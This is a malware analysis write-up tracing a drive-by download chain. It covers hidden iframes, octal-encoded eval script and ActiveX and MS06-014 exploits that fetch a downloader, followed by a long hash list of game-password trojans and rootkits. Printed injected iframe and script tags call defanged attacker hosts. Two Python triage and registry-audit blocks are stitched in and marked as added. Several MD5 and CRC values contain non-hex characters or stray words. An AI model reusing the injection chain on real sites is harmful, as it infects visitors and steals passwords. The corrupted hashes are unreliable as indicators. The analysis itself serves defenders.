Trojan.Win32.KillAV, Trojan.PSW.Win32.QQPass, RootKit.Win32.Mnless, etc.
Original by endurer
1st-04-03
The web page contains the code:
/---
<IFRAME src="hxxp://www.t**-T**o*u*.CN/ping.html" width="0" Height="0" frameborder="0"></iframe>
---/
#1 hxxp://www.t**-T**o*u*.CN/ping.html contains the code:
/---
<IFRAME src=hxxp://**A.1**5*8d*m**.com/b3.htm?001 width=0 Height=0></iframe>
---/
#1.1 hxxp://**A.1**5*8d*m**.com/b3.htm?001 contains the code:
/---
<Script language=JavaScript src=hxxp://*B*.1**5*8d*m**.com/One/OK.js></SCRIPT>
<IFRAME src=hxxp://*B*.1**5*8d*m**.COM/One/OK.htm width=1 Height=1 border=1></iframe>
---/
#1.1.1 hxxp://*B*.1**5*8d*m**.com/One/OK.js
Uses the RealPlayer rmoc3260.dll (CLSID: 2f542a2e-edc9-4bf7-8cb1-87c9919f7f93) vulnerability to download hxxp://*C**.1**5*8d*m**.com/OK.exe
File Description: D:/test/OK .exe
Attribute: ---
An error occurred while obtaining the file version information!
Creation Time:
Modification time:
Access time:
Size: 17552 bytes, 17.144 KB
MD5: 5sp_70021acab5e000c4dfff29cd451c
Sha1: 578dfdebf168e049a3ab802c832636488a2f0456
CRC32: 4b9edaef
Kaspersky reports Trojan.Win32.KillAV.qe, Rising reports Trojan.Win32.Undef.efz.
OK.exe uses image hijacking (IFEO, Image File Execution Options), ShellExecuteHook, and other techniques to prevent anti-virus software from starting, and downloads the files listed in hxxp://*C**.1**5*8d*m**.COM/OK.txt.
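One way to check a host for the image hijacking (IFEO) technique described above, as an added example that is not part of the original post: it parses the text of a `reg export` of the Image File Execution Options key and lists every image that has a Debugger value. The sample export, the watchlist of process names and the placeholder path are constructed for illustration.

```python
import re

SECTION = re.compile(r"^\[(.+)\]$")
VALUE = re.compile(r'^"([^"]+)"="(.*)"$')
IFEO_SUFFIX = r"\image file execution options"
# Assumption: process names an analyst treats as high priority (security and admin tools).
WATCHLIST = {"avp.exe", "regedit.exe", "taskmgr.exe"}

def audit_ifeo(export_text):
    """Return (image, debugger, priority) for each IFEO subkey that sets Debugger."""
    findings, image = [], None
    for line in export_text.splitlines():
        line = line.strip()
        section = SECTION.match(line)
        if section:
            parent, _, leaf = section.group(1).rpartition("\\")
            # Only direct children of the IFEO key name an executable image.
            image = leaf if parent.lower().endswith(IFEO_SUFFIX) else None
            continue
        value = VALUE.match(line)
        if image and value and value.group(1).lower() == "debugger":
            # .reg files escape backslashes and quotes inside string values.
            target = value.group(2).replace("\\\\", "\\").replace('\\"', '"')
            priority = "high" if image.lower() in WATCHLIST else "review"
            findings.append((image, target, priority))
    return findings

# Constructed sample in `reg export` text form (real exports are UTF-16; decode first).
SAMPLE_EXPORT = r'''Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avp.exe]
"Debugger"="C:\\WINDOWS\\system32\\placeholder.exe"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\notepad.exe]
"GlobalFlag"=dword:00000000

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\devtool.exe]
"debugger"="vsjitdebugger.exe"
'''

if __name__ == "__main__":
    for finding in audit_ifeo(SAMPLE_EXPORT):
        print(finding)
```

A Debugger value is also used legitimately by developers, so entries outside the watchlist are marked for review rather than treated as malicious.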
File Description: D:/test/ao.exe
Attribute: ---
An error occurred while obtaining the file version information!
Creation Time:
Modification time:
Access time: 14:26:30
Size: 78686 bytes, 76.862 KB
MD5: 89f3ee2e22bbd8b266a293f5166fc17a
Sha1: 281693777e23dabf78d8008762b37afe40da7a55
CRC32: d398c5b0
Kaspersky reports Trojan.Win32.Agent.jfx [KLAB-4526233]
File Description: D:/test/a1.exe
Attribute: ---
An error occurred while obtaining the file version information!
Creation Time:
Modification time:
Access time: 14:26:30
Size: 22776 bytes, 22.248 KB
MD5: 24b7771b9e1afb8b449213515682a17a
Sha1: c10e5f88214d5d59dc2513d531973c28ebab0434
CRC32: a9249d9a
Kaspersky reports Trojan-PSW.Win32.OnLineGames.yog, Rising reports Trojan.PSW.Win32.GameOL.mjf
File Description: D:/test/a2.exe
Attribute: ---
An error occurred while obtaining the file version information!
Creation Time:
Modification time:
Access time:
Size: 21079 bytes, 20.599 KB
MD5: 702b5959df5bd296f76597fa64143831
Sha1: 34ec9f5cbb7e68b83d02780725213701767e1cf7
CRC32: 7f3dfe3b
Kaspersky reports Trojan-PSW.Win32.OnLineGames.ymj, Rising reports Trojan.PSW.Win32.GameOL.gen
File Description: D:/test/a3.exe
Attribute: ---
An error occurred while obtaining the file version information!
Creation Time:
Modification time:
Access time: 14:47:26
Size: 20468 bytes, 19.1012 KB
MD5: 8a7f7d39b47919e70901_df5b24ac4d
Sha1: f0f0cb79c124f768252ffef92ac8a5eb91d9d079
CRC32: cbca1fad
Rising reports Trojan.PSW.Win32.GameOL.gen.
File Description: D:/test/a4.exe
Attribute: ---
An error occurred while obtaining the file version information!
Creation Time:
Modification time:
Access time:
Size: 19632 bytes, 19.176 KB
MD5: 642aa45bd05212683008e2798f9cb2f8
Sha1: 422ec027bddf7c5bd8a535b4dc7aa2cc1_defb1
CRC32: ff9d839b
Rising reports Trojan.PSW.Win32.GameOL.mta.
File Description: D:/test/a5.exe
Attribute: ---
An error occurred while obtaining the file version information!
Creation Time:
Modification time:
Access time:
Size: 14972 bytes, 14.636 KB
MD5: b893b68b3ebd8f5e2c0f07c3de4e55f9
Sha1: 439597aff3785fab138b00de716f202cf8fc0d69
CRC32: 97dd3497
Kaspersky reports Trojan-PSW.Win32.OnLineGames.yog, Rising reports Trojan.PSW.Win32.GameOL.mjf
File Description: D:/test/a6.exe
Attribute: ---
An error occurred while obtaining the file version information!
Creation Time:
Modification time:
Access time:
Size: 19924 bytes, 19.468 KB
MD5: 913ccd2b2828423a0929a706f199908e
Sha1: 4b0e66b96a5db16a8c358447bc6688a47178fe13
CRC32: 4dfa63f5
Rising reports RootKit.Win32.Mnless.la
File Description: D:/test/a7.exe
Attribute: ---
An error occurred while obtaining the file version information!
Creation Time:
Modification time:
Access time:
Size: 14568 bytes, 14.232 KB
MD5: 4f781b24439d8c74803735820a51cb36
Sha1: 2a127fdd247d187dfb7ee71e675657c8b121c229
CRC32: 0ccc1ae2
Kaspersky reports Trojan-PSW.Win32.OnLineGames.yog, Rising reports Trojan.PSW.Win32.GameOL.mjf
File Description: D:/test/a8.exe
Attribute: ---
An error occurred while obtaining the file version information!
Creation Time:
Modification time:
Access time:
Size: 19939 bytes, 19.483 KB
MD5: 3be779060716d94062c0d7dd870b730a
Sha1: 08145bc24b2a4853b37eb89d562133f09853174d
CRC32: 93a08250
Kaspersky reports Trojan-PSW.Win32.OnLineGames.wjm, Rising reports Trojan.PSW.Win32.GameOL.gen
File Description: D:/test/a9.exe
Attribute: ---
An error occurred while obtaining the file version information!
Creation Time:
Modification time:
Access time:
Size: 17908 bytes, 17.500 KB
MD5: 4a9c60c56a45513871e66a1eb3a7c567
Sha1: bd85c7495e9fa41095bc623ed5b2f8df92dc2df2
CRC32: f1fe083d
Kaspersky reports Trojan-Downloader.Win32.Zlob.geg, Rising reports Trojan.PSW.Win32.GameOL.mjf
File Description: D:/test/a10.exe
Attribute: ---
An error occurred while obtaining the file version information!
Creation Time:
Modification time:
Access time:
Size: 19363 bytes, 18.931 KB
MD5: ce5c37b3e404229d91fb5cb64c5e0889
Sha1: f433a2d216a1ba9dfb3ac960f8b22d12f334b5ef
CRC32: a8565a23
Kaspersky reports Trojan-PSW.Win32.OnLineGames.vlp, Rising reports Trojan.PSW.Win32.GameOL.gen
File Description: D:/test/a11.exe
Attribute: ---
An error occurred while obtaining the file version information!
Creation Time:
Modification time:
Access time:
Size: 19724 bytes, 19.268 KB
MD5: b3ac229ffcac4f802f9cbb01bb02087a
Sha1: ca9e7476acd9ea1ea4732c5d231501bf056f2c6
CRC32: 856092b1
Rising reports Trojan.PSW.Win32.GameOL.gen.
File Description: D:/test/a12.exe
Attribute: ---
An error occurred while obtaining the file version information!
Creation Time:
Modification time:
Access time:
Size: 19756 bytes, 19.300 KB
MD5: 7975719e767a35e55554293477838238
Sha1: d148aef2bfe2bbc49b1fdcc9a71e179b6b086f7c
CRC32: c17a2595
Kaspersky reports Trojan-PSW.Win32.OnLineGames.usl, Rising reports Trojan.PSW.Win32.GameOL.mnp
a13.exe failed to download
File Description: D:/test/a14.exe
Attribute: ---
An error occurred while obtaining the file version information!
Creation Time:
Modification time:
Access time:
Size: 19278 bytes, 18.846 KB
MD5: dca0c58d2158eb2fdfcbf373bbe36e19
Sha1: 587981c29a8b5fbdd53a1c68340a89080a4564dc
CRC32: 44f05cc4
Kaspersky reports Trojan-PSW.Win32.OnLineGames.uff, Rising reports Trojan.PSW.Win32.GameOL.gen
File Description: D:/test/a15.exe
Attribute: ---
An error occurred while obtaining the file version information!
Creation Time:
Modification time:
Access time:
Size: 19711 bytes, 19.255 KB
MD5: 23bd8fd302d6ddb0857f5f6cb0c3ce67
Sha1: a5a21c15ccc4bb7a5e0be5c4802c28e69486f0cc
CRC32: 255.d25e9
Kaspersky reports Trojan-PSW.Win32.OnLineGames.wpa, Rising reports Trojan.PSW.Win32.GameOL.gen
File Description: D:/test/a16.exe
Attribute: ---
An error occurred while obtaining the file version information!
Creation Time:
Modification time:
Access time:
Size: 19207 bytes, 18.775 KB
MD5: 69e5f34e26384573f64218a2b128953f
Sha1: cdc3cd20c7c8e555358328f1dbec97715ae550c4
CRC32: cbfcbe1b
Kaspersky reports Trojan-PSW.Win32.OnLineGames.ucj, Rising reports Trojan.PSW.Win32.GameOL.gen
File Description: D:/test/a17.exe
Attribute: ---
An error occurred while obtaining the file version information!
Creation Time:
Modification time:
Access time:
Size: 17344 bytes, 16.960 KB
MD5: 08f21d970af5864e8c5808c147da9aea
Sha1: 51d128c9689363913fcbbb0a909ee2f196688dd1
CRC32: 5a962297
Kaspersky reports Trojan-PSW.Win32.OnLineGames.yut, Rising reports RootKit.Win32.Mnless.la
File Description: D:/test/a18.exe
Attribute: ---
An error occurred while obtaining the file version information!
Creation Time:
Modification time:
Access time:
Size: 14376 bytes, 14.40 KB
MD5: dbca31108a6f14db776b1ff862ecc30a
Sha1: d85b565670c980ba6ca73f8c2fd1ba9b5c1cd8e7
CRC32: bfffb79a
Rising reports Trojan.PSW.Win32.GameOL.mjf
File Description: D:/test/a19.exe
Attribute: ---
An error occurred while obtaining the file version information!
Creation Time:
Modification time:
Access time:
Size: 33419 bytes, 32.651 KB
MD5: 7542020c6141918e8f0c8058c456e66a
Sha1: 3ca9ced11cf1ca869e9dbdfe60af9cf1422c294c
CRC32: bea7fc10
Kaspersky reports Trojan-PSW.Win32.QQPass.bmd, Rising reports Trojan.PSW.Win32.QQPass.zfa
File Description: D:/test/a20.exe
Attribute: ---
An error occurred while obtaining the file version information!
Creation Time:
Modification time:
Access time:
Size: 16963 bytes, 16.579 KB
MD5: 02de1cd1ddacc63a71c30e5bdcc4ad4d
Sha1: 9b32a3db1d6f63cffcfd768ff2b1128d7d98110a
CRC32: 63a5d8f6
Rising reports Trojan.PSW.Win32.GameOL.gen.
File Description: D:/test/a21.exe
Attribute: ---
An error occurred while obtaining the file version information!
Creation Time:
Modification time:
Access time:
Size: 14624 bytes, 14.288 KB
MD5: d3fada2b4c9a447e57838076bf1540c5
Sha1: 6663ee2437770cba7222cb111b88a6e250af00b4
CRC32: 8e5984ee
Kaspersky reports Trojan-PSW.Win32.OnLineGames.whs, Rising reports Trojan.PSW.Win32.GameOL.mjf
File Description: D:/test/a22.exe
Attribute: ---
An error occurred while obtaining the file version information!
Created at: 14:28:10
Modification time: 14:28:10
Access time:
Size: 14116 bytes, 13.804 KB
MD5: d50a1deabba26f48a1ebcf101ffc68a9
Sha1: c39a8562463b1a5a74edc7ac0f1c5d954a6f666a
CRC32: 159e2390
Kaspersky reports Trojan-PSW.Win32.OnLineGames.whs, Rising reports Trojan.PSW.Win32.GameOL.mjf
File Description: D:/test/a23.exe
Attribute: ---
An error occurred while obtaining the file version information!
Created at: 14:28:10
Modification time: 14:28:10
Access time:
Size: 20264 bytes, 19.808 KB
MD5: a1sp_81a8061fc0c0ebc4c7d4d764126
Sha1: b1656dbb1c6d1af14694c5925d5b8cb454ef6b22
CRC32: 526c5bdc
Kaspersky reports Trojan-PSW.Win32.OnLineGames.wfb, Rising reports Trojan.PSW.Win32.GameOL.gen
File Description: D:/test/a24.exe
Attribute: ---
An error occurred while obtaining the file version information!
Created at: 14:28:10
Modification time: 14:28:10
Access time:
Size: 14784 bytes, 14.448 KB
MD5: 6fda-bca0e1629a4cf0b5eec89b5f7ac
Sha1: 2f8d1c40b520bbc14bc210e7b40f6bb2cf7ce203
CRC32: 7b352family
Kaspersky reports Trojan-PSW.Win32.OnLineGames.whs, Rising reports Trojan.PSW.Win32.GameOL.mjf
File Description: D:/test/a25.exe
Attribute: ---
An error occurred while obtaining the file version information!
Created at: 14:28:10
Modification time: 14:28:10
Access time:
Size: 13972 bytes, 13.660 KB
MD5: 21bb9e1eba6588de8595a2309a81d19d
Sha1: baed94795612ec633f0d45303de5fe710682b6f1
CRC32: 7a169f5f
Kaspersky reports Trojan-PSW.Win32.OnLineGames.whs, Rising reports Trojan.PSW.Win32.GameOL.mss
File Description: D:/test/a26.exe
Attribute: ---
An error occurred while obtaining the file version information!
Created at: 14:28:11
Modification time: 14:28:11
Access time:
Size: 29613 bytes, 28.941 KB
MD5: d2a5792a249763d45e10fababfb624f9
Sha1: 6a01c4b11f587325c5a6e68849cd4d9d711e208e
CRC32: 7119f971
Kaspersky reports Trojan-PSW.Win32.Lmir.bpv, Rising reports Trojan.PSW.Win32.GamesOnline.fz
a27.exe failed to download
File Description: D:/test/a28.exe
Attribute: ---
An error occurred while obtaining the file version information!
Created at: 14:28:11
Modification time: 14:28:12
Access time:
Size: 14856 bytes, 14.520 KB
MD5: 1370394482e46fc35eceb6dda7728cc6
Sha1: fa0151af6685adbf4d5a87ce685f63615206de4d
CRC32: 60ff2aa7
Kaspersky reports Trojan-PSW.Win32.OnLineGames.whs, Rising reports Trojan.PSW.Win32.GameOL.mjf
File Description: D:/test/a29.exe
Attribute: ---
An error occurred while obtaining the file version information!
Created at: 14:28:12
Modification time: 14:28:12
Access time:
Size: 17318 bytes, 16.934 KB
MD5: d00d9aab855309712a6ef4fc8730951b
Sha1: 87671c6ed6e13b68b8810ca48646ee333cde946b
CRC32: 41189142
Kaspersky reports Trojan-PSW.Win32.OnLineGames.xjn, Rising reports Trojan.PSW.Win32.GameOL.gen
File Description: D:/test/a30.exe
Attribute: ---
An error occurred while obtaining the file version information!
Created at: 14:28:12
Modification time: 14:28:13
Access time:
Size: 17188 bytes, 16.804 KB
MD5: f10a6e968e72080f02eb60c4146ddbbd
Sha1: e2525b7f75e8f4860ff3bb09ced7292c111cc3c1
CRC32: 66ec0f6c
Kaspersky reports Trojan-PSW.Win32.OnLineGames.ymv, Rising reports Trojan.PSW.Win32.GameOL.gen
File Description: D:/test/a31.exe
Attribute: ---
An error occurred while obtaining the file version information!
Created at: 14:28:13
Modification time: 14:28:13
Access time:
Size: 15132 bytes, 14.796 KB
MD5: c9e920a1a62a58f1ce99d7ef31d9bd0c
Sha1: 3b0f42e272fa99417b04401c82796202d8b14d36
CRC32: de7a9b7a
Kaspersky reports Trojan-PSW.Win32.OnLineGames.whs, Rising reports Trojan.PSW.Win32.GameOL.mjf
a32.exe cannot be downloaded
File Description: D:/test/a33.exe
Attribute: ---
An error occurred while obtaining the file version information!
Created at: 14:28:13
Modification time: 14:28:14
Access time:
Size: 20128 bytes, 19.672 KB
MD5: c5e2c08165f17d949b1bac0523f63444
Sha1: a827f6c90937df75b8b33d9db5599c2aae0969b7
CRC32: 5834455e
Kaspersky reports Trojan-PSW.Win32.OnLineGames.yuu, Rising reports Trojan.PSW.Win32.XYOnline.acg
File Description: D:/test/a34.exe
Attribute: ---
An error occurred while obtaining the file version information!
Created at: 14:28:14
Modification time: 14:28:14
Access time:
Size: 17440 bytes, 17.32 KB
MD5: f1dcb41a1edea089aeba5a15a4b9286f
Sha1: 58fd2a0a8581dba2afb290271acaf9d94bcc2f3a
CRC32: ee164f46
Kaspersky reports Trojan-PSW.Win32.OnLineGames.ysl, Rising reports RootKit.Win32.Mnless.la
File Description: D:/test/avp.exe
Attribute: ---
An error occurred while obtaining the file version information!
Created at: 14:28:15
Modification time: 14:28:15
Access time:
Size: 43136 bytes, 42.128 KB
MD5: 1276b927abdf9f15a76141e86f473774
Sha1: e198b37ee0fe40478785b22c550974f1e709a71f
CRC32: 932eb6b8
Kaspersky reports Trojan-PSW.Win32.OnLineGames.uvg, Rising reports Trojan.Win32.Undef.efx
File Description: D:/test/oko.exe
Attribute: ---
An error occurred while obtaining the file version information!
Created at: 14:28:14
Modification time: 14:28:14
Access time:
Size: 1024 bytes, 1.0 kb
MD5: f2bf82138d664f6826be8fc485421361
Sha1: 92af88aced0d804237464904541024c25236824b
CRC32: e1352b66
Rising reports Trojan.Win32.Undef.efx.
#1.1.2 hxxp://*B*.1**5*8d*m**.com/One/OK.htm contains the code:
/---
<Script language="JavaScript">
eval("\151\146\50\144\157\143\165" + "\155...(omitted)...\12\175")
</SCRIPT>
---/
The decoded script checks the cookie variable OK and outputs the code:
/---
<SCRIPT src=hxxp://*B*.1**5*8d*m**.com/One/14.js></SCRIPT>
<SCRIPT src=hxxp://*B*.1**5*8d*m**.com/One/RL.js></SCRIPT>
<SCRIPT src=hxxp://*B*.1**5*8d*m**.com/One/LZ.js></SCRIPT>
---/
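A static triage helper for pages like the ones above, as an added example that is not part of the original post: it lists the iframe and script loads in a page, marks iframes sized 0 or 1 pixel as hidden, and decodes octal-escaped eval() strings as data (nothing is executed) to find the loads they write out. The sample page and its example.invalid hosts are constructed.

```python
import re

# JS octal escape: \0-\377 (three digits only when the first is 0-3).
OCTAL = re.compile(r"\\([0-3][0-7]{0,2}|[4-7][0-7]?)")
LITERAL = re.compile(r'"((?:[^"\\]|\\.)*)"')
EVAL_CALL = re.compile(r'eval\s*\(\s*((?:"(?:[^"\\]|\\.)*"\s*\+?\s*)+)\)', re.I)
TAG = re.compile(r"<(iframe|script)\b([^>]*)>", re.I)
ATTR = re.compile(r'(\w+)\s*=\s*"?([^\s">]+)')

def decode_octal(text):
    return OCTAL.sub(lambda m: chr(int(m.group(1), 8)), text)

def unwrap_eval(html):
    """Decode eval("..." + "...") bodies as data; nothing is executed."""
    return [decode_octal("".join(LITERAL.findall(m.group(1))))
            for m in EVAL_CALL.finditer(html)]

def external_loads(html):
    """Return (tag, src, hidden) for every iframe/script that pulls in a URL."""
    loads = []
    for tag, attrs in TAG.findall(html):
        a = {k.lower(): v for k, v in ATTR.findall(attrs)}
        if "src" in a:
            dims = [a.get("width", ""), a.get("height", "")]
            hidden = tag.lower() == "iframe" and all(
                d.isdigit() and int(d) <= 1 for d in dims)
            loads.append((tag.lower(), a["src"], hidden))
    return loads

def triage(html):
    """Loads visible in the markup plus those revealed by decoding eval() strings."""
    loads = external_loads(html)
    for body in unwrap_eval(html):
        loads.extend(external_loads(body))
    return loads

def _octal(s):  # used only to build the constructed sample below
    return "".join("\\%o" % ord(c) for c in s)

# Constructed sample: placeholder hosts, defanged scheme, same shape as the pages above.
INNER = 'document.write("<script src=hxxp://b.example.invalid/One/x.js></script>")'
SAMPLE = ('<iframe src=hxxp://a.example.invalid/b.htm width=0 height=0></iframe>\n'
          '<script>eval("' + _octal(INNER[:9]) + '"+"' + _octal(INNER[9:]) + '")</script>')

if __name__ == "__main__":
    for load in triage(SAMPLE):
        print(load)
```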
#1.1.2.1 hxxp://*B*.1**5*8d*m**.com/One/14.js
Uses the MS06-014 vulnerability to download hxxp://*C**.1**5*8d*m**.com/OK.exe
#1.1.2.2 hxxp://*B*.1**5*8d*m**.com/One/RL.js
Uses the RealPlayer (IERPCtl.IERPCtl.1) vulnerability to download hxxp://*C**.1**5*8d*m**.com/OK.exe
#1.1.2.3 hxxp://*B*.1**5*8d*m**.com/One/LZ.js
Uses the vulnerability in CLSID: 61f5c358-60fb-4a23-a312-d2b556620f20 to download hxxp://*C**.1**5*8d*m**.com/OK.exe.
#1.1.2.4 Uses BaiduBar.Tool to download hxxp://*C**.1**5*8d*m**.com/Baidu.cab, which contains new.exe